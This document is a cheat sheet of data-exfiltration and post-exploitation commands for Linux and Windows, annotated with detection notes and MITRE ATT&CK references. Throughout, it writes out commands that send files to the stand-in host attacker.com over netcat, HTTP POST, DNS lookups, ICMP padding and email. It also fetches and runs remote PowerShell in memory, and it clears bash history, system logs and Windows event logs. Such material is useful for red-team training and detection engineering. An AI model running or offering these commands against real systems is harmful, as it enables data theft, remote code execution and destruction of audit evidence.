Data Exfiltration
File Transfer Methods
Linux
HTTP Server
# Python HTTP server: serves the current directory over plain HTTP on port 8000
# with no authentication or TLS. First form is Python 3, second is Python 2.
python3 -m http.server 8000
python -m SimpleHTTPServer 8000
# Download from target (commands run on the target host)
# Detection: proxy/egress logs showing the default Wget/ or curl/ User-Agent
# fetching from an external host on a non-standard port such as 8000.
wget http://attacker.com:8000/file
curl http://attacker.com:8000/file -o file
# NOTE(review): this snippet was labelled "Upload to attacker", but the
# commands move file.txt from the attacker host to the target (the nc listener
# sends it, the target saves it), so it is another download.
# On attacker
while true; do nc -l -p 80 -q 1 < file.txt; done
# On target
curl http://attacker.com/file.txt > file.txt
Netcat
# Plain netcat moves the file as raw, unencrypted and unauthenticated TCP, so
# the content is visible to network inspection.
# Detection: an nc process holding a listener or an outbound connection on an
# unusual port (4444 here); default-deny egress stops the target-side connect.
# Send file (attacker receives)
# On attacker
nc -l -p 4444 > received_file
# On target
nc attacker.com 4444 < file_to_send
# Receive file (attacker sends)
# On attacker
nc -l -p 4444 < file_to_send
# On target
nc attacker.com 4444 > received_file
SCP
# scp runs over SSH: the transfer is encrypted and authenticated, and sshd on
# the remote host records it as an SSH login. All three forms are run from the
# operator's machine; user@target is the remote side.
# Defender view: review sshd auth logs on the target for unexpected logins and
# source addresses.
# Copy from target
scp user@target:/path/to/file /local/path
# Copy to target
scp /local/file user@target:/path/to/
# Recursive
scp -r user@target:/path/to/dir /local/path
Base64 Encoding
# base64 is an encoding, not encryption: it only makes binary data safe to
# move through a text channel (terminal, clipboard) and grows it by about a
# third. Content inspection that decodes base64 still sees the original data.
# Encode and exfiltrate
base64 file.txt > file.b64
cat file.b64 # Copy and paste
# Decode
base64 -d file.b64 > file.txt
DNS Exfiltration
# Encode data in DNS queries
# The unquoted $(cat data.txt) is word-split by the shell, so every
# whitespace-separated token (not every line) becomes the leftmost label of
# one lookup under attacker.com; the token is used as-is.
# Detection: resolver query logs showing many unique, never-repeated
# subdomains under a single parent domain.
for line in $(cat data.txt); do
dig $line.attacker.com
done
Windows
PowerShell Download
# Download file
# wget and iwr are Windows PowerShell aliases for Invoke-WebRequest, so all
# three lines are the same cmdlet writing the response to C:\file.txt.
Invoke-WebRequest -Uri http://attacker.com/file.txt -OutFile C:\file.txt
wget http://attacker.com/file.txt -OutFile C:\file.txt
iwr http://attacker.com/file.txt -OutFile C:\file.txt
# Execute in memory
# DownloadString + IEX runs the fetched script without saving it to disk, so
# there is no file for on-access scanning to inspect.
# Detection: PowerShell Script Block Logging (event ID 4104, when enabled) and
# AMSI still see the script content.
IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')
# Download and execute
# Same technique started from a separate powershell process; the full command
# line is visible to process-creation logging.
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')"
PowerShell Upload
# Both forms send C:\file.txt to a plain-HTTP endpoint in a single POST.
# Detection: proxy logs for POST requests with large bodies from workstations
# to hosts with no business relationship.
# Upload via POST
Invoke-RestMethod -Uri http://attacker.com/upload -Method Post -InFile C:\file.txt
# Upload using WebClient
(New-Object System.Net.WebClient).UploadFile('http://attacker.com/upload', 'C:\file.txt')
Certutil
# Download file
# certutil is a built-in certificate tool; -urlcache -f makes it fetch a URL
# and write the result to the named file.
# Detection: process-creation logging (event ID 4688 with command line, or
# Sysmon event ID 1) for certutil.exe with "urlcache" and a URL in its
# arguments.
certutil -urlcache -f http://attacker.com/file.txt file.txt
certutil -urlcache -split -f http://attacker.com/file.txt file.txt
BITSAdmin
# Download file
# Creates a Background Intelligent Transfer Service job named "mydownload";
# the transfer is carried out by the BITS service rather than by
# bitsadmin.exe itself (MITRE ATT&CK T1197, BITS Jobs).
# Detection: the Microsoft-Windows-Bits-Client/Operational log records BITS
# jobs, in addition to process-creation logging for bitsadmin.exe.
bitsadmin /transfer mydownload /download /priority high http://attacker.com/file.txt C:\file.txt
SMB
# Both forms make the Windows host open an SMB session to a remote server.
# Risk beyond the file copy: Windows typically attempts NTLM authentication
# to that server as the logged-on user.
# Mitigation: block outbound SMB (TCP 445) at the perimeter.
# Copy from SMB share
copy \\attacker.com\share\file.txt C:\file.txt
# Net use
net use Z: \\attacker.com\share
copy Z:\file.txt C:\file.txt
FTP
# Create FTP script
# The script file holds the username and password in cleartext on disk, and
# FTP also sends them unencrypted on the wire.
echo open attacker.com > ftp.txt
echo user username password >> ftp.txt
echo binary >> ftp.txt
echo get file.txt >> ftp.txt
echo bye >> ftp.txt
# Execute
# -s: makes the Windows ftp client read its commands from the file.
# Detection: ftp.exe started with -s: and outbound TCP 21 from workstations.
ftp -s:ftp.txt
Data Compression
Linux Compression
# Archiving is the usual staging step before a transfer (MITRE ATT&CK T1560,
# Archive Collected Data).
# Detection: archive tools run over large or sensitive directory trees,
# followed shortly by outbound traffic from the same host.
# Tar and gzip
tar -czf archive.tar.gz /path/to/data
# Zip
zip -r archive.zip /path/to/data
# 7zip
7z a archive.7z /path/to/data
Windows Compression
# Compress folder
# Detection: PowerShell Script Block Logging (event ID 4104, when enabled)
# records Compress-Archive calls with their source and destination paths.
Compress-Archive -Path C:\data -DestinationPath C:\data.zip
# Extract
Expand-Archive -Path C:\data.zip -DestinationPath C:\extracted
Exfiltration Over Allowed Protocols
HTTPS
# Upload via curl
# -F sends data.txt as a multipart/form-data POST. Over HTTPS the body is not
# visible to network monitoring without TLS inspection; destination host,
# upload volume and timing remain observable.
curl -X POST -F "file=@data.txt" https://attacker.com/upload
# With authentication
# -u puts the credentials on the command line, where process listings and
# command-line auditing capture them.
curl -X POST -F "file=@data.txt" -u user:pass https://attacker.com/upload
DNS
# Encode data in DNS queries
# xxd -p hex-encodes the file and fold -w2 splits the hex into two-character
# chunks, so the loop issues one lookup per byte of data.txt.
# Detection: a burst of queries for very short, unique labels under a single
# parent domain in resolver logs.
for b in $(xxd -p data.txt | fold -w2); do
dig $b.attacker.com
done
ICMP
# ICMP exfiltration
# On attacker (listen)
# tcpdump captures on eth0 with a filter that matches ICMP only.
tcpdump -i eth0 icmp
# On target (send)
# -p sets the pad bytes that fill the echo-request payload; here they are the
# hex form of the echo output.
# Detection: echo requests whose payload differs from the operating system's
# default pattern; restricting outbound ICMP removes the channel.
ping -c 1 -p $(echo "data" | xxd -p) attacker.com
Cloud Storage
# These CLIs upload with whatever credentials are already configured for the
# tool. The traffic is HTTPS to well-known provider domains, so domain
# reputation alone does not separate it from sanctioned use (MITRE ATT&CK
# T1567.002, Exfiltration to Cloud Storage).
# Controls: proxy or CASB tenant restrictions, and endpoint monitoring for
# these binaries on hosts that have no reason to run them.
# AWS S3
aws s3 cp file.txt s3://bucket/file.txt
# Azure Blob
az storage blob upload -f file.txt -c container -n file.txt
# Google Drive (gdrive)
gdrive upload file.txt
# Dropbox (dbxcli)
dbxcli put file.txt /remote/path
Email Exfiltration
# Send file via email
# Detection: mail-gateway DLP on outbound attachments, and blocking direct
# outbound SMTP from hosts that are not mail servers.
echo "Sensitive data" | mail -s "Subject" -a file.txt attacker@email.com
# PowerShell
# Sends through the SMTP server named in -SmtpServer, so that server's logs
# record sender, recipient and message size.
Send-MailMessage -To "attacker@email.com" -From "target@email.com" -Subject "Data" -Attachment "C:\data.txt" -SmtpServer smtp.server.com
Screen Capture
Linux Capture
# Take screenshot
# Both tools (scrot; import from ImageMagick) capture the X display and need
# access to the user's X session (MITRE ATT&CK T1113, Screen Capture).
scrot screenshot.png
import -window root screenshot.png
Windows Capture
# PowerShell screenshot
# Reads the primary screen bounds, creates a bitmap of that size, copies the
# screen contents into it and saves the result to C:\screenshot.png.
# Detection: PowerShell Script Block Logging (event ID 4104, when enabled)
# showing CopyFromScreen.
Add-Type -AssemblyName System.Windows.Forms
$screen = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds
$bitmap = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height
$graphics = [System.Drawing.Graphics]::FromImage($bitmap)
$graphics.CopyFromScreen($screen.Location, [System.Drawing.Point]::Empty, $screen.Size)
$bitmap.Save("C:\screenshot.png")
Keylogging
Linux Keylogging
# Log keystrokes
# xinput list enumerates the X input devices; xinput test prints the events of
# the chosen device (<device-id> is a placeholder for an id from the list).
# This works because X11 lets a client on the display read input events from
# devices it does not own; Wayland sessions do not give clients that access.
xinput list
xinput test <device-id>
Windows Keylogging
# PowerShell keylogger
# Use Get-Keystrokes from PowerSploit
Covering Tracks
Linux Tracks
# Clear bash history
# history -c empties the in-memory history of the current shell; rm removes
# the saved history file (MITRE ATT&CK T1070.003, Clear Command History).
history -c
rm ~/.bash_history
# Clear logs
# Each redirect replaces the log's contents with a single newline.
# Detection: a log that suddenly shrinks or shows a timestamp gap. Forwarding
# to a remote syslog collector keeps a copy the host cannot alter.
echo "" > /var/log/auth.log
echo "" > /var/log/syslog
# Clear wtmp
# wtmp is a binary login-record file; after this write it no longer holds
# prior logins, and an emptied login history is itself a tampering indicator.
echo "" > /var/log/wtmp
Windows Tracks
# Clear event logs
# Clearing is itself logged: event ID 1102 is written to the Security log when
# it is cleared, and event ID 104 to the System log when another log is
# cleared. Forwarding events off-host (WEF or a SIEM) preserves the originals.
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# PowerShell
Clear-EventLog -LogName System
Clear-EventLog -LogName Security
Clear-EventLog -LogName Application
# NOTE(review): this command was labelled "Delete specific events", but
# wevtutil qe only queries: it prints Security events with EventID 4624
# (successful logon) as text and removes nothing.
wevtutil qe Security /q:"*[System[(EventID=4624)]]" /f:text
Useful Links